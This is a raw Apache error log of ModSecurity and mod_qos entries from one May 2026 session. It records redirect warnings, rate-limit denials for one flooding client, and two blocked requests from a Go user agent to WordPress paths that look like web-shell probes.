[Tue May 26 20:00:29.310248 2026] [security2:error] [pid 93576:tid 93782] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWug2DRMqfxdEDkoswDxgAAAEY"]
[Tue May 26 20:00:29.312671 2026] [security2:error] [pid 93576:tid 93771] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWug2DRMqfxdEDkoswDzQAAADs"]
[Tue May 26 20:00:29.318153 2026] [security2:error] [pid 93576:tid 93779] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWug2DRMqfxdEDkoswDzgAAAEM"]
[Tue May 26 20:00:29.340585 2026] [security2:error] [pid 106517:tid 106672] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhIZZc2DoU1lPnP1gewAAAJs"]
[Tue May 26 20:00:29.345555 2026] [security2:error] [pid 93576:tid 93774] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWug2DRMqfxdEDkoswDxwAAAD4"]
[Tue May 26 20:00:29.345618 2026] [security2:error] [pid 93576:tid 93746] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWug2DRMqfxdEDkoswDxAAAACI"]
[Tue May 26 20:00:29.346336 2026] [security2:error] [pid 106517:tid 106683] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWug4ZZc2DoU1lPnP1gSgAAAKU"]
[Tue May 26 20:00:29.361983 2026] [security2:error] [pid 93576:tid 93827] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWug2DRMqfxdEDkoswD3wAAAHM"]
[Tue May 26 20:00:29.363481 2026] [security2:error] [pid 106517:tid 106753] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWug4ZZc2DoU1lPnP1gRgAAAOs"]
[Tue May 26 20:00:29.364296 2026] [security2:error] [pid 106517:tid 106722] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhIZZc2DoU1lPnP1gdAAAAMw"]
[Tue May 26 20:00:29.371015 2026] [security2:error] [pid 93576:tid 93713] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWug2DRMqfxdEDkoswDzwAAAAE"]
[Tue May 26 20:00:29.389816 2026] [security2:error] [pid 93576:tid 93778] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWug2DRMqfxdEDkoswD0wAAAEI"]
[Tue May 26 20:00:29.390374 2026] [security2:error] [pid 93576:tid 93825] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhGDRMqfxdEDkoswD6AAAAHE"]
[Tue May 26 20:00:29.391070 2026] [security2:error] [pid 106517:tid 106664] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhIZZc2DoU1lPnP1gdwAAAJM"]
[Tue May 26 20:00:29.401438 2026] [security2:error] [pid 93576:tid 93791] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWug2DRMqfxdEDkoswD0QAAAE8"]
[Tue May 26 20:00:29.403895 2026] [security2:error] [pid 93576:tid 93744] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWug2DRMqfxdEDkoswD3AAAACA"]
[Tue May 26 20:00:29.412033 2026] [security2:error] [pid 93576:tid 93783] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhGDRMqfxdEDkoswEAQAAAEc"]
[Tue May 26 20:00:29.417278 2026] [security2:error] [pid 106517:tid 106708] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWug4ZZc2DoU1lPnP1gTQAAAL4"]
[Tue May 26 20:00:29.420300 2026] [security2:error] [pid 93576:tid 93786] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhGDRMqfxdEDkoswEAAAAAEo"]
[Tue May 26 20:00:29.422823 2026] [security2:error] [pid 106517:tid 106682] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhIZZc2DoU1lPnP1geQAAAKQ"]
[Tue May 26 20:00:29.432062 2026] [security2:error] [pid 106517:tid 106727] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhIZZc2DoU1lPnP1ggAAAANE"]
[Tue May 26 20:00:29.436042 2026] [security2:error] [pid 106517:tid 106660] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhIZZc2DoU1lPnP1gfwAAAI8"]
[Tue May 26 20:00:29.437001 2026] [security2:error] [pid 106517:tid 106724] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhIZZc2DoU1lPnP1gigAAAM4"]
[Tue May 26 20:00:29.443782 2026] [security2:error] [pid 106517:tid 106684] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhIZZc2DoU1lPnP1gkwAAAKY"]
[Tue May 26 20:00:29.450699 2026] [security2:error] [pid 93576:tid 93755] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhGDRMqfxdEDkoswEDwAAACs"]
[Tue May 26 20:00:29.474746 2026] [security2:error] [pid 93576:tid 93732] [client 103.163.220.37:51361] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/plugins/shell/"] [unique_id "ahWuhWDRMqfxdEDkoswEXgAAABQ"]
[Tue May 26 20:00:29.575260 2026] [qos:error] [pid 106517:tid 106777] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuhYZZc2DoU1lPnP1hHgAAAQM
[Tue May 26 20:00:29.577824 2026] [qos:error] [pid 106517:tid 106743] [client 45.148.10.120:46646] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhYZZc2DoU1lPnP1hIAAAAOE
[Tue May 26 20:00:29.579975 2026] [qos:error] [pid 93576:tid 93839] [client 45.148.10.120:53524] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhWDRMqfxdEDkoswEbwAAAH8
[Tue May 26 20:00:29.585300 2026] [qos:error] [pid 106517:tid 106724] [client 45.148.10.120:57980] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhYZZc2DoU1lPnP1hIwAAAM4
[Tue May 26 20:00:29.586477 2026] [qos:error] [pid 93576:tid 93731] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhWDRMqfxdEDkoswEcAAAABM
[Tue May 26 20:00:29.591408 2026] [qos:error] [pid 93576:tid 93819] [client 45.148.10.120:57874] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhWDRMqfxdEDkoswEcQAAAGs
[Tue May 26 20:00:29.595976 2026] [qos:error] [pid 93576:tid 93742] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuhWDRMqfxdEDkoswEcgAAAB4
[Tue May 26 20:00:29.596458 2026] [qos:error] [pid 106517:tid 106761] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuhYZZc2DoU1lPnP1hJAAAAPM
[Tue May 26 20:00:29.627291 2026] [qos:error] [pid 93576:tid 93827] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuhWDRMqfxdEDkoswEdAAAAHM
[Tue May 26 20:00:29.627821 2026] [qos:error] [pid 106517:tid 106689] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuhYZZc2DoU1lPnP1hKAAAAKs
[Tue May 26 20:00:29.728087 2026] [qos:error] [pid 106517:tid 106724] [client 45.148.10.120:46646] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhYZZc2DoU1lPnP1hKwAAAM4
[Tue May 26 20:00:29.733860 2026] [qos:error] [pid 93576:tid 93738] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhWDRMqfxdEDkoswEeAAAABo
[Tue May 26 20:00:29.734634 2026] [qos:error] [pid 106517:tid 106728] [client 45.148.10.120:57980] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhYZZc2DoU1lPnP1hLgAAANI
[Tue May 26 20:00:29.736259 2026] [qos:error] [pid 93576:tid 93738] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuhWDRMqfxdEDkoswEegAAABo
[Tue May 26 20:00:29.745212 2026] [qos:error] [pid 93576:tid 93830] [client 45.148.10.120:57874] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhWDRMqfxdEDkoswEfQAAAHY
[Tue May 26 20:00:29.750157 2026] [qos:error] [pid 106517:tid 106730] [client 45.148.10.120:58028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhYZZc2DoU1lPnP1hMAAAANQ
[Tue May 26 20:00:29.753372 2026] [qos:error] [pid 93576:tid 93797] [client 45.148.10.120:58114] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhWDRMqfxdEDkoswEfgAAAFU
[Tue May 26 20:00:29.780537 2026] [qos:error] [pid 93576:tid 93783] [client 45.148.10.120:46668] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhWDRMqfxdEDkoswEfwAAAEc
[Tue May 26 20:00:29.782146 2026] [qos:error] [pid 106517:tid 106723] [client 45.148.10.120:58056] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhYZZc2DoU1lPnP1hMQAAAM0
[Tue May 26 20:00:29.814072 2026] [qos:error] [pid 93576:tid 93720] [client 45.148.10.120:53542] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhWDRMqfxdEDkoswEgAAAAAg
[Tue May 26 20:00:29.882112 2026] [qos:error] [pid 93576:tid 93743] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhWDRMqfxdEDkoswEgwAAAB8
[Tue May 26 20:00:29.883597 2026] [qos:error] [pid 106517:tid 106700] [client 45.148.10.120:46646] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhYZZc2DoU1lPnP1hOQAAALY
[Tue May 26 20:00:29.887039 2026] [qos:error] [pid 106517:tid 106689] [client 45.148.10.120:57980] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhYZZc2DoU1lPnP1hOgAAAKs
[Tue May 26 20:00:29.887040 2026] [qos:error] [pid 93576:tid 93798] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuhWDRMqfxdEDkoswEhAAAAFY
[Tue May 26 20:00:29.901336 2026] [qos:error] [pid 93576:tid 93714] [client 45.148.10.120:57874] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhWDRMqfxdEDkoswEhQAAAAI
[Tue May 26 20:00:29.906871 2026] [qos:error] [pid 106517:tid 106745] [client 45.148.10.120:58028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhYZZc2DoU1lPnP1hOwAAAOM
[Tue May 26 20:00:29.921878 2026] [qos:error] [pid 93576:tid 93717] [client 45.148.10.120:58114] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhWDRMqfxdEDkoswEhgAAAAU
[Tue May 26 20:00:29.934409 2026] [qos:error] [pid 93576:tid 93718] [client 45.148.10.120:46668] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhWDRMqfxdEDkoswEhwAAAAY
[Tue May 26 20:00:29.935846 2026] [qos:error] [pid 106517:tid 106664] [client 45.148.10.120:58056] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhYZZc2DoU1lPnP1hPAAAAJM
[Tue May 26 20:00:29.964836 2026] [security2:error] [pid 106517:tid 106659] [client 103.163.220.31:46769] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/css/colors/modern/test2.php"] [unique_id "ahWuhYZZc2DoU1lPnP1hQgAAAI4"]
[Tue May 26 20:00:29.965061 2026] [qos:error] [pid 93576:tid 93734] [client 45.148.10.120:53542] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhWDRMqfxdEDkoswEiwAAABY
[Tue May 26 20:00:30.030957 2026] [qos:error] [pid 93576:tid 93814] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhmDRMqfxdEDkoswEjAAAAGY
[Tue May 26 20:00:30.034268 2026] [qos:error] [pid 106517:tid 106724] [client 45.148.10.120:46646] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhoZZc2DoU1lPnP1hRAAAAM4
[Tue May 26 20:00:30.036695 2026] [qos:error] [pid 106517:tid 106728] [client 45.148.10.120:57980] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhoZZc2DoU1lPnP1hRQAAANI
[Tue May 26 20:00:30.036870 2026] [qos:error] [pid 93576:tid 93752] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhmDRMqfxdEDkoswEjQAAACg
[Tue May 26 20:00:30.059985 2026] [qos:error] [pid 93576:tid 93803] [client 45.148.10.120:57874] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhmDRMqfxdEDkoswEjgAAAFs
[Tue May 26 20:00:30.061251 2026] [qos:error] [pid 106517:tid 106675] [client 45.148.10.120:58028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhoZZc2DoU1lPnP1hRgAAAJ4
[Tue May 26 20:00:30.075878 2026] [qos:error] [pid 93576:tid 93747] [client 45.148.10.120:58114] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhmDRMqfxdEDkoswEkAAAACM
[Tue May 26 20:00:30.086911 2026] [qos:error] [pid 93576:tid 93755] [client 45.148.10.120:46668] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhmDRMqfxdEDkoswEkQAAACs
[Tue May 26 20:00:30.090087 2026] [qos:error] [pid 106517:tid 106730] [client 45.148.10.120:58056] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhoZZc2DoU1lPnP1hSQAAANQ
[Tue May 26 20:00:30.115238 2026] [qos:error] [pid 93576:tid 93765] [client 45.148.10.120:53542] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhmDRMqfxdEDkoswEkgAAADU
[Tue May 26 20:00:30.179926 2026] [qos:error] [pid 93576:tid 93732] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhmDRMqfxdEDkoswEkwAAABQ
[Tue May 26 20:00:30.184357 2026] [qos:error] [pid 106517:tid 106684] [client 45.148.10.120:46646] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhoZZc2DoU1lPnP1hSgAAAKY
[Tue May 26 20:00:30.186304 2026] [qos:error] [pid 93576:tid 93771] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhmDRMqfxdEDkoswElAAAADs
[Tue May 26 20:00:30.186444 2026] [qos:error] [pid 106517:tid 106715] [client 45.148.10.120:57980] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhoZZc2DoU1lPnP1hSwAAAMU
[Tue May 26 20:00:30.215966 2026] [qos:error] [pid 106517:tid 106679] [client 45.148.10.120:58028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhoZZc2DoU1lPnP1hTgAAAKE
[Tue May 26 20:00:30.225357 2026] [qos:error] [pid 93576:tid 93759] [client 45.148.10.120:57874] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhmDRMqfxdEDkoswElgAAAC8
[Tue May 26 20:00:30.230006 2026] [qos:error] [pid 93576:tid 93839] [client 45.148.10.120:58114] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhmDRMqfxdEDkoswElwAAAH8
[Tue May 26 20:00:30.238907 2026] [qos:error] [pid 93576:tid 93731] [client 45.148.10.120:46668] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhmDRMqfxdEDkoswEmAAAABM
[Tue May 26 20:00:30.244800 2026] [qos:error] [pid 106517:tid 106713] [client 45.148.10.120:58056] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhoZZc2DoU1lPnP1hTwAAAMM
[Tue May 26 20:00:30.279931 2026] [security2:error] [pid 106517:tid 106747] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhIZZc2DoU1lPnP1giQAAAOU"]
[Tue May 26 20:00:30.281184 2026] [security2:error] [pid 106517:tid 106680] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhIZZc2DoU1lPnP1gegAAAKI"]
[Tue May 26 20:00:30.293013 2026] [security2:error] [pid 106517:tid 106710] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhIZZc2DoU1lPnP1ggwAAAMA"]
[Tue May 26 20:00:30.298640 2026] [security2:error] [pid 93576:tid 93769] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhGDRMqfxdEDkoswEDQAAADk"]
[Tue May 26 20:00:30.306290 2026] [security2:error] [pid 93576:tid 93736] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhGDRMqfxdEDkoswEAgAAABg"]
[Tue May 26 20:00:30.307682 2026] [security2:error] [pid 106517:tid 106653] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhIZZc2DoU1lPnP1gnAAAAIg"]
[Tue May 26 20:00:30.313519 2026] [security2:error] [pid 93576:tid 93763] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhGDRMqfxdEDkoswEEQAAADM"]
[Tue May 26 20:00:30.325074 2026] [security2:error] [pid 93576:tid 93822] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhGDRMqfxdEDkoswEFgAAAG4"]
[Tue May 26 20:00:30.325156 2026] [security2:error] [pid 106517:tid 106685] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhIZZc2DoU1lPnP1ghQAAAKc"]
[Tue May 26 20:00:30.327738 2026] [security2:error] [pid 106517:tid 106665] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhIZZc2DoU1lPnP1gkQAAAJQ"]
[Tue May 26 20:00:30.345104 2026] [security2:error] [pid 106517:tid 106748] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhIZZc2DoU1lPnP1gmQAAAOY"]
[Tue May 26 20:00:30.355255 2026] [security2:error] [pid 93576:tid 93729] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhWDRMqfxdEDkoswETQAAABE"]
[Tue May 26 20:00:30.361242 2026] [security2:error] [pid 93576:tid 93770] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhGDRMqfxdEDkoswEGAAAADo"]
[Tue May 26 20:00:30.367426 2026] [security2:error] [pid 93576:tid 93796] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuhGDRMqfxdEDkoswEEAAAAFQ"]
